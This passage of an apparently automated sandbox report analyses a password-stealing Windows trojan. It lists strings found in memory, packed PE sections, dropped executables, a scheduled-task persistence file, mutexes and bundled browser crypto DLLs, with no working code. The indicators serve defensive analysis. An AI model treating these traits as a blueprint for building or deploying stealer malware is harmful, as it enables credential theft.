Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1730833023.0000000001B7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, KKKJKEBKFCAAECAAAAAE.0.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1730833023.0000000001B7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: EHJJKFCBGIDGHIECGCBKFHIEBG.0.dr String found in binary or memory: https://www.mozilla.org
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E28000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: EHJJKFCBGIDGHIECGCBKFHIEBG.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E28000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E28000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000F2A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: EHJJKFCBGIDGHIECGCBKFHIEBG.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000F2A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/npvZC5maWxlds:
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000F2A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E28000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1796836946.000000002917C000.00000004.00000020.00020000.00000000.sdmp, EHJJKFCBGIDGHIECGCBKFHIEBG.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: EHJJKFCBGIDGHIECGCBKFHIEBG.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E28000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1796836946.000000002917C000.00000004.00000020.00020000.00000000.sdmp, EHJJKFCBGIDGHIECGCBKFHIEBG.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E28000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

System Summary
barindex
PE file contains section with special chars
Source: BGIIDAEBGC.exe.0.dr Static PE information: section name:
Source: BGIIDAEBGC.exe.0.dr Static PE information: section name: .idata
Source: BGIIDAEBGC.exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name: .idata
Source: explorti.exe.5.dr Static PE information: section name:
PE file has nameless sections
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name:
Source: a37ec701f3.exe.8.dr Static PE information: section name:
Source: a37ec701f3.exe.8.dr Static PE information: section name:
Source: a37ec701f3.exe.8.dr Static PE information: section name:
Source: a37ec701f3.exe.8.dr Static PE information: section name:
Source: a37ec701f3.exe.8.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4EED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 0_2_6C4EED10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C52B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C52B700
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C52B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C52B8C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C52B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C52B910
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C4CF280
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4C35A0 0_2_6C4C35A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4D5440 0_2_6C4D5440
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C53545C 0_2_6C53545C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C505C10 0_2_6C505C10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C512C10 0_2_6C512C10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C53AC00 0_2_6C53AC00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C53542B 0_2_6C53542B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4D64C0 0_2_6C4D64C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4ED4D0 0_2_6C4ED4D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C506CF0 0_2_6C506CF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4CD4E0 0_2_6C4CD4E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4D6C80 0_2_6C4D6C80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C5234A0 0_2_6C5234A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C52C4A0 0_2_6C52C4A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4DFD00 0_2_6C4DFD00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4F0512 0_2_6C4F0512
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4EED10 0_2_6C4EED10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C500DD0 0_2_6C500DD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C5285F0 0_2_6C5285F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C503E50 0_2_6C503E50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4E4640 0_2_6C4E4640
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4E9E50 0_2_6C4E9E50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C512E4E 0_2_6C512E4E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C536E63 0_2_6C536E63
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4CC670 0_2_6C4CC670
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C507E10 0_2_6C507E10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C515600 0_2_6C515600
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C529E30 0_2_6C529E30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C5376E3 0_2_6C5376E3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4CBEF0 0_2_6C4CBEF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4DFEF0 0_2_6C4DFEF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C52E680 0_2_6C52E680
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4E5E90 0_2_6C4E5E90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C524EA0 0_2_6C524EA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C507710 0_2_6C507710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4D9F00 0_2_6C4D9F00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4CDFE0 0_2_6C4CDFE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4F6FF0 0_2_6C4F6FF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C5177A0 0_2_6C5177A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4E8850 0_2_6C4E8850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4ED850 0_2_6C4ED850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C50F070 0_2_6C50F070
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4D7810 0_2_6C4D7810
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C50B820 0_2_6C50B820
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C514820 0_2_6C514820
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C5350C7 0_2_6C5350C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4EC0E0 0_2_6C4EC0E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C5058E0 0_2_6C5058E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4F60A0 0_2_6C4F60A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4EA940 0_2_6C4EA940
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C51B970 0_2_6C51B970
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C53B170 0_2_6C53B170
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4DD960 0_2_6C4DD960
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C505190 0_2_6C505190
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C522990 0_2_6C522990
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4CC9A0 0_2_6C4CC9A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4FD9B0 0_2_6C4FD9B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C509A60 0_2_6C509A60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C508AC0 0_2_6C508AC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C50E2F0 0_2_6C50E2F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4E1AF0 0_2_6C4E1AF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C53BA90 0_2_6C53BA90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C532AB0 0_2_6C532AB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4C22A0 0_2_6C4C22A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4F4AA0 0_2_6C4F4AA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4DCAB0 0_2_6C4DCAB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4C5340 0_2_6C4C5340
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4DC370 0_2_6C4DC370
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C50D320 0_2_6C50D320
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C5353C8 0_2_6C5353C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4CF380 0_2_6C4CF380
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 8_2_007CE410 8_2_007CE410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 8_2_007C4CD0 8_2_007C4CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 8_2_00803048 8_2_00803048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 8_2_007F7D63 8_2_007F7D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 8_2_00806EE9 8_2_00806EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 8_2_007C4AD0 8_2_007C4AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 8_2_0080763B 8_2_0080763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 8_2_00802BB0 8_2_00802BB0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 8_2_00808700 8_2_00808700
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 8_2_0080775B 8_2_0080775B
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F770B79 11_2_7F770B79
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Code function: 11_2_7F770000 11_2_7F770000
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: String function: 6C5094D0 appears 90 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: String function: 6C4FCBE8 appears 134 times
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001C34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883646644.000000006C745000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
Uses 32bit PE files
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static PE information: Section: ZLIB complexity 0.9996665396341463
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static PE information: Section: ZLIB complexity 0.99517822265625
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static PE information: Section: ZLIB complexity 0.9893798828125
Source: BGIIDAEBGC.exe.0.dr Static PE information: Section: ZLIB complexity 0.9976359716530054
Source: BGIIDAEBGC.exe.0.dr Static PE information: Section: vtxoxanz ZLIB complexity 0.9944127768378961
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9976359716530054
Source: amadka[1].exe.0.dr Static PE information: Section: vtxoxanz ZLIB complexity 0.9944127768378961
Source: explorti.exe.5.dr Static PE information: Section: ZLIB complexity 0.9976359716530054
Source: explorti.exe.5.dr Static PE information: Section: vtxoxanz ZLIB complexity 0.9944127768378961
Source: random[1].exe.8.dr Static PE information: Section: ZLIB complexity 0.9996665396341463
Source: random[1].exe.8.dr Static PE information: Section: ZLIB complexity 0.99517822265625
Source: random[1].exe.8.dr Static PE information: Section: ZLIB complexity 0.9893798828125
Source: a37ec701f3.exe.8.dr Static PE information: Section: ZLIB complexity 0.9996665396341463
Source: a37ec701f3.exe.8.dr Static PE information: Section: ZLIB complexity 0.99517822265625
Source: a37ec701f3.exe.8.dr Static PE information: Section: ZLIB complexity 0.9893798828125
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@19/28@0/3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C527030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C527030
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File created: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1870480409.000000001CE9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883425451.000000006C6FF000.00000002.00000001.01000000.00000007.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882687782.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1870480409.000000001CE9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883425451.000000006C6FF000.00000002.00000001.01000000.00000007.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882687782.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1870480409.000000001CE9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883425451.000000006C6FF000.00000002.00000001.01000000.00000007.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882687782.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1870480409.000000001CE9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883425451.000000006C6FF000.00000002.00000001.01000000.00000007.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882687782.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1870480409.000000001CE9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883425451.000000006C6FF000.00000002.00000001.01000000.00000007.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882687782.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1870480409.000000001CE9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882687782.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1870480409.000000001CE9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883425451.000000006C6FF000.00000002.00000001.01000000.00000007.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882687782.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
